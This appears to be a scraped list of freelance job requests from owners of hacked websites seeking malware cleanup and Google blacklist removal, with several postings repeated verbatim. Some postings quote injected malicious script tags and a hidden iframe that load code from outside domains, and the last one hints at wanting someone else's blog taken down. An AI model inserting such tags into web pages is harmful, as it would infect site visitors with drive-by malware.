Hi,
I need someone to scan and check my website for virus and malicious code… Google blocks my website right now saying that it is infected.
Need this done NOW. (Website is not so large)
Thanks
Someone posted a malicious script/web spam on my site. PLease I need someone to remove it asap.
Someone posted a malicious script/web spam on my site. PLease I need someone to remove it asap.
I have a website www.sportstoursireland.com
A pop up saying malicious url blocked is appearing on my webiste.
I have attached a picture below
I recently had someone upload a malicious file to one of my sites hosted on Godaddy. Godaddy made me aware of the situation and is requiring that I remove any and all malicious files and that I implement more security into my sites to ensure this doesn’t happen again.
Since I had no idea that some of my back-end files were vulnerable due to having open admin access, I now need to make sure this doesn’t happen again.
I have about 20 sites +/- that I need to ensure are fully 100% secure from hackers and potential malicious file uploads. I believe that there are only 2 sites that had this issue, because the malicious file was uploaded in an area where admin can upload products for E commerce and there are only two sites that allowed products to be uploaded.
This is easy for the right person, please only respond to this project if you are fully qualified and 100% confident that you can help me secure my files without messing up any of my websites.
Thanks,
JS
Dear site owner or webmaster of jekishan.com,
>
> We recently discovered that some of your pages can cause users to be
> infected with malicious software. We have begun showing a warning page to
> users who visit these pages by clicking a search result on Google.com.
>
> Below are some example URLs on your site which can cause users to be
> infected (space inserted to prevent accidental clicking in case your mail
> client auto-links URLs):
>
> http://jekishan .com/
> http://www.jekishan .com/
> http://www.jekishan .com/index.php?manufacturers_id=2
>
> Here is a link to a sample warning page:
> http://www.google.com/interstitial?url=http%3A//jekishan.com/
>
> We strongly encourage you to investigate this immediately to protect your
> visitors. Although some sites intentionally distribute malicious software,
> in many cases the webmaster is unaware because:
>
> 1) the site was compromised
> 2) the site doesn’t monitor for malicious user-contributed content
> 3) the site displays content from an ad network that has a malicious
> advertiser
>
> If your site was compromised, it’s important to not only remove the
> malicious (and usually hidden) content from your pages, but to also identify
> and fix the vulnerability. We suggest contacting your hosting provider if
> you are unsure of how to proceed. StopBadware also has a resource page for
> securing compromised sites:
> http://www.stopbadware.org/home/security
>
> Once you’ve secured your site, you can request that the warning be removed
> by visiting
> http://www.google.com/support/webmasters/bin/answer.py?answer=45432
> and requesting a review. If your site is no longer harmful to users, we will
> remove the warning.
It seems that I have a malware issue or virus on my site. I need to get someone to clean this up. Her is the email from google. Had it once before and got it cleaned right away, but seems that it might of come back.
Dear AdWords Advertiser,
Your account has been suspended because we’ve determined
there’s a high probability your site may be hosting or distributing
malicious software.
Please visit
https://adwords.google.com/support/bin/answer.py?hl=en&answer=141633 if
you feel your site has been mistakenly identified, need help
understanding the issue and how to address it. Contact us through
http://adwords.google.com/support/bin/request.py?display=form&contact_type=malware
if you’ve made changes to your site so that it no longer hosts or
distributes malicious software and you’ve secured your site so that it
is no longer vulnerable to the insertion of malware.
Currently, our tests indicate that the following URLs may contain code
which installs malicious software:
hxxp://www.poolnation.com/product_info.php?products_id=70
These URLs are located in your account within the following campaign(s)
and ad group(s): The Pool Cleaner – Pool Cleaner
In order to protect your visitors, we recommend that you check these
specific pages immediately, as well as the rest of your website.
Although some sites intentionally distribute malicious software, there
are many cases where the webmaster or advertiser is unaware of the
dangerous link due to any of the following reasons:
1) The site was compromised.
2) The site doesn’t monitor for malicious user-contributed content.
3) The site displays content from an ad network that has an advertiser
distributing malicious software.
If your site was compromised, it’s important to not only remove the
malicious (and usually hidden) content from your pages, but to also
identify and fix the vulnerability. We suggest contacting your hosting
provider if you’re unsure of how to proceed. StopBadware also has a
resource page for securing compromised sites at
http://www.stopbadware.org/home/security. Google uses its own criteria,
procedures, and tools to identify sites that host or distribute malware.
Sincerely,
The Google AdWords Team
It seems that I have a malware issue or virus on my site. I need to get someone to clean this up. Her is the email from google. Had it once before and got it cleaned right away, but seems that it might of come back.
Dear AdWords Advertiser,
Your account has been suspended because we’ve determined
there’s a high probability your site may be hosting or distributing
malicious software.
Please visit
https://adwords.google.com/support/bin/answer.py?hl=en&answer=141633 if
you feel your site has been mistakenly identified, need help
understanding the issue and how to address it. Contact us through
http://adwords.google.com/support/bin/request.py?display=form&contact_type=malware
if you’ve made changes to your site so that it no longer hosts or
distributes malicious software and you’ve secured your site so that it
is no longer vulnerable to the insertion of malware.
Currently, our tests indicate that the following URLs may contain code
which installs malicious software:
hxxp://www.poolnation.com/product_info.php?products_id=70
These URLs are located in your account within the following campaign(s)
and ad group(s): The Pool Cleaner – Pool Cleaner
In order to protect your visitors, we recommend that you check these
specific pages immediately, as well as the rest of your website.
Although some sites intentionally distribute malicious software, there
are many cases where the webmaster or advertiser is unaware of the
dangerous link due to any of the following reasons:
1) The site was compromised.
2) The site doesn’t monitor for malicious user-contributed content.
3) The site displays content from an ad network that has an advertiser
distributing malicious software.
If your site was compromised, it’s important to not only remove the
malicious (and usually hidden) content from your pages, but to also
identify and fix the vulnerability. We suggest contacting your hosting
provider if you’re unsure of how to proceed. StopBadware also has a
resource page for securing compromised sites at
http://www.stopbadware.org/home/security. Google uses its own criteria,
procedures, and tools to identify sites that host or distribute malware.
Sincerely,
The Google AdWords Team
Our website has been infected with malware, hacked and infected with viruses many times in the past month.
I need someone to fix it and prevent it from happening in the future. Make our website more secure.
I need a skilled programmer to thoroughly scan our files for our website and remove malicious code or backdoors.
I have an older version of the website that I can send to you for a thorough scanning.
When you are completed, the website must be 100% clean and ready for upload.
YOU MUST HAVE EXPERIENCE WITH VIRUS & MALWARE REMOVAL!!
Project must be completed immediately!
Your work will be checked by other programmers.
PMB is you have any questions.
Yesterday Google listed my site as an attack site.
I’m running Joomla 1.5 and have a secure login so don’t see how I could have been compromised.
I searched my site and could not see any malicious code. I then used dasient.com to do a full scan of the site and they could not find any malicious code. I’ve used Google’s Safe Browsing diagnostic and they returned the following:
………………………………
Site is listed as suspicious – visiting this web site may harm your computer.
Part of this site was listed for suspicious activity 1 time(s) over the past 90 days.
What happened when Google visited this site?
Of the 5 pages we tested on the site over the past 90 days, 0 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2010-03-11, and the last time suspicious content was found on this site was on 2010-03-11.
Malicious software includes 15 exploit(s), 1 scripting exploit(s).
This site was hosted on 1 network(s) including AS36351 (SOFTLAYER).
Has this site acted as an intermediary resulting in further distribution of malware?
Over the past 90 days, miltonweb.ca did not appear to function as an intermediary for the infection of any sites.
Has this site hosted malware?
Yes, this site has hosted malicious software over the past 90 days. It infected 11 domain(s), including fp10.jp/, gmarket.co.kr/, ariakarasanat.com/.
………………………………..
I need someone who knows how to get me OFF the Google blacklist QUICKLY.
PLEASE, only personal responses. ALSO, please only respond if you can do this and are somewhat of a security expert.
Thanks
Someone managed to get my FTP passwords and entered a script into my Joomla sites (2 sites). The script changes but is currently inserting the following into the source code:
<script src=http://cod2-cheats.extra.hu/images/successful.php ></script>
And:
<script src=http://cosmeticclinicindia.com/images/qcw2/maninLinksBG.php ></script>
Based on a Google search it seems to be related to Trojan-Downloader.JS.Gumblar.x
Also, searching forums I found this: http://forum.kaspersky.com/index.php?showtopic=145296 which says it’s just a false positive. However, it’s still in my source code so musst be doing something.
I need someone that can remove it.
My server has been compromised somehow and has participated in a DDoS attack against other servers. I need someone to find the malicious script, find out how it got to the server (finding the website that was exploited) remove it, and secure the server (or website affected) to prevent this from happening again.
Site has been affected with Malware warnign by Google and need to get handled asap this was the review from our host provider what they found when reviewing site after attack as follows
The website “focuzprinting.com” was infected with a malicious iframe code(IFrame Injection Attack). There are lot of files under your domain infected with iframe attack. The files are infected with the code:
iframe src=”http://shopvideofest.cn:8080/index.php” width=120 height=189 style=”visibility: hidden
Since the access log of the domain is rotated, we are unable to find the exact source of his attack. It looks like the attacker used the vulnerability of either the php scripts(oScommerce and wordpress) or the weak permission of your files.
I could see that you are using old version of oScommerce(public_html) and wordpress(public_html/blog) for your site. If you have any local backup of your account, please upload it in your root folder(/home/focugcom) so that we can restore your account from it. Once the account has been restored, please upgrade your oScommerce and wordpress to its latest stable version.
We recommend the following in order stop such attacks in future:
1. Use strong password for your account FTP/Cpanel/mail. Please refer the URL http://strongpasswordgenerator.com to generate strong password.
Some secure password tips would be:
# Don’t use a dictionary word
# Don’t use part of the username
# Keep the password at least 7 characters long
# Have a combination of at least three of:
- lowercase characters (a, b, c)
- uppercase characters (A, B, C)
- numbers (1, 2, 3)
- non-alphanumeric characters (!, %, *, {,
Site has been affected with Malware warnign by Google and need to get handled asap this was the review from our host provider what they found when reviewing site after attack as follows
The website “focuzprinting.com” was infected with a malicious iframe code(IFrame Injection Attack). There are lot of files under your domain infected with iframe attack. The files are infected with the code:
iframe src=”http://shopvideofest.cn:8080/index.php” width=120 height=189 style=”visibility: hidden
Since the access log of the domain is rotated, we are unable to find the exact source of his attack. It looks like the attacker used the vulnerability of either the php scripts(oScommerce and wordpress) or the weak permission of your files.
I could see that you are using old version of oScommerce(public_html) and wordpress(public_html/blog) for your site. If you have any local backup of your account, please upload it in your root folder(/home/focugcom) so that we can restore your account from it. Once the account has been restored, please upgrade your oScommerce and wordpress to its latest stable version.
We recommend the following in order stop such attacks in future:
1. Use strong password for your account FTP/Cpanel/mail. Please refer the URL http://strongpasswordgenerator.com to generate strong password.
Some secure password tips would be:
# Don’t use a dictionary word
# Don’t use part of the username
# Keep the password at least 7 characters long
# Have a combination of at least three of:
- lowercase characters (a, b, c)
- uppercase characters (A, B, C)
- numbers (1, 2, 3)
- non-alphanumeric characters (!, %, *, {,
Site has been affected with Malware warnign by Google and need to get handled asap this was the review from our host provider what they found when reviewing site after attack as follows
The website “focuzprinting.com” was infected with a malicious iframe code(IFrame Injection Attack). There are lot of files under your domain infected with iframe attack. The files are infected with the code:
iframe src=”http://shopvideofest.cn:8080/index.php” width=120 height=189 style=”visibility: hidden
Since the access log of the domain is rotated, we are unable to find the exact source of his attack. It looks like the attacker used the vulnerability of either the php scripts(oScommerce and wordpress) or the weak permission of your files.
I could see that you are using old version of oScommerce(public_html) and wordpress(public_html/blog) for your site. If you have any local backup of your account, please upload it in your root folder(/home/focugcom) so that we can restore your account from it. Once the account has been restored, please upgrade your oScommerce and wordpress to its latest stable version.
We recommend the following in order stop such attacks in future:
1. Use strong password for your account FTP/Cpanel/mail. Please refer the URL http://strongpasswordgenerator.com to generate strong password.
Some secure password tips would be:
# Don’t use a dictionary word
# Don’t use part of the username
# Keep the password at least 7 characters long
# Have a combination of at least three of:
- lowercase characters (a, b, c)
- uppercase characters (A, B, C)
- numbers (1, 2, 3)
- non-alphanumeric characters (!, %, *, {,
Site has been affected with Malware warnign by Google and need to get handled asap this was the review from our host provider what they found when reviewing site after attack as follows
The website “focuzprinting.com” was infected with a malicious iframe code(IFrame Injection Attack). There are lot of files under your domain infected with iframe attack. The files are infected with the code:
iframe src=”http://shopvideofest.cn:8080/index.php” width=120 height=189 style=”visibility: hidden
Since the access log of the domain is rotated, we are unable to find the exact source of his attack. It looks like the attacker used the vulnerability of either the php scripts(oScommerce and wordpress) or the weak permission of your files.
I could see that you are using old version of oScommerce(public_html) and wordpress(public_html/blog) for your site. If you have any local backup of your account, please upload it in your root folder(/home/focugcom) so that we can restore your account from it. Once the account has been restored, please upgrade your oScommerce and wordpress to its latest stable version.
We recommend the following in order stop such attacks in future:
1. Use strong password for your account FTP/Cpanel/mail. Please refer the URL http://strongpasswordgenerator.com to generate strong password.
Some secure password tips would be:
# Don’t use a dictionary word
# Don’t use part of the username
# Keep the password at least 7 characters long
# Have a combination of at least three of:
- lowercase characters (a, b, c)
- uppercase characters (A, B, C)
- numbers (1, 2, 3)
- non-alphanumeric characters (!, %, *, {,
Site has been affected with Malware warnign by Google and need to get handled asap this was the review from our host provider what they found when reviewing site after attack as follows
The website “focuzprinting.com” was infected with a malicious iframe code(IFrame Injection Attack). There are lot of files under your domain infected with iframe attack. The files are infected with the code:
iframe src=”http://shopvideofest.cn:8080/index.php” width=120 height=189 style=”visibility: hidden
Since the access log of the domain is rotated, we are unable to find the exact source of his attack. It looks like the attacker used the vulnerability of either the php scripts(oScommerce and wordpress) or the weak permission of your files.
I could see that you are using old version of oScommerce(public_html) and wordpress(public_html/blog) for your site. If you have any local backup of your account, please upload it in your root folder(/home/focugcom) so that we can restore your account from it. Once the account has been restored, please upgrade your oScommerce and wordpress to its latest stable version.
We recommend the following in order stop such attacks in future:
1. Use strong password for your account FTP/Cpanel/mail. Please refer the URL http://strongpasswordgenerator.com to generate strong password.
Some secure password tips would be:
# Don’t use a dictionary word
# Don’t use part of the username
# Keep the password at least 7 characters long
# Have a combination of at least three of:
- lowercase characters (a, b, c)
- uppercase characters (A, B, C)
- numbers (1, 2, 3)
- non-alphanumeric characters (!, %, *, {,
My web site has been hacked and google has flagged it for malicious content. My hosting company has checked and told me that I need to do the following:
1) Review your content to insure that it does not contain the malicious code
2) Update anti-virus definitions and scan for viruses
3) Update FTP passwords using strong password practices
4) Remove the malicious code from the files or (preferably) remove site content and re-upload clean versions of the files.
Additionally, if Google has flagged your website as containing malicious content, it will be necessary for you to contact Google to have it removed from this status.
I need someone experienced who can get the site running correctly again and get it unflagged by google. The site is designed in PHP with Linux hosting.
A PHP function that searches HTML and JavaScript for common exploits that could automatically download a file, or install a worm on a user’s computer.
The function should consider any type of automatic file download to be potentially malicious, even if it opens a download prompt. It should also consider all embedded objects to be malicious, except for Flash Player.
The HTML or JavaScript should be inputted into the function as a string parameter. After searching, the function should return a boolean indicating whether the file is safe, or if it contains potentially dangerous code.
The function will need to be written exclusively for this project, and must not be encrypted in any way.
I am looking for someone who is capable of getting a malicious blog(blogger) removed from the internet or the content/account changed.. I do not think flagging it is a solution that will work. I need someone that is capable of more………
Subscribe in a reader
or
by Email (for daily job notification)
